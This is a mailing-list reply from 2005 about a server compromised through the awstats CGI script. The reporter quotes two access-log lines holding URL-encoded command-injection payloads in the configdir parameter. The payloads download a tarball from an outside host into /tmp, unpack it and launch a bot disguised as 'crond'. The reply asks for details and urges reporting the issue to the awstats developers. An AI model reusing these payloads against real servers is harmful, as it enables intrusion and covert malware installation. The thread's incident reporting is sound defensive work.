Re: Security Breach

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Am Fr, den 04.03.2005 schrieb Chris Strzelczyk um 17:40:

> I just though I would let you know how my server got compromised.  This  
> even happend after I installed the new version of awstats on Wednesday.
> So in short I don't know if it is OK to run awstats as a cgi executable.
> 
> These are from my access log:
> 
>   "GET  
> /cgi-bin/awstats.pl? 
> configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2 
> 0zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2eta 
> r%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec 
> ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
> 
>   "GET  
> /cgi-bin/awstats.pl? 
> configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidi 
> lis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20 
> psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b% 
> 2500 HTTP/1.1" 200 634 "-" "-"
> 
> 
> -cs

Thank you for this report.
So you are saying that even with awstats 6.4 you got compromised as
Apache did execute the logged command and a trojan then started running
located in /tmp? If so, would you please be so kind and report that
issue to the awstats project guys as soon as possible?

Alexander


-- 
Alexander Dalloz | Enger, Germany | GPG http://pgp.mit.edu 0xB366A773
legal statement: http://www.uni-x.org/legal.html
Fedora Core 2 GNU/Linux on Athlon with kernel 2.6.10-1.14_FC2smp 
Serendipity 18:32:39 up 11 days, 5:41, load average: 0.20, 0.17, 0.25 

Attachment: signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil


[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux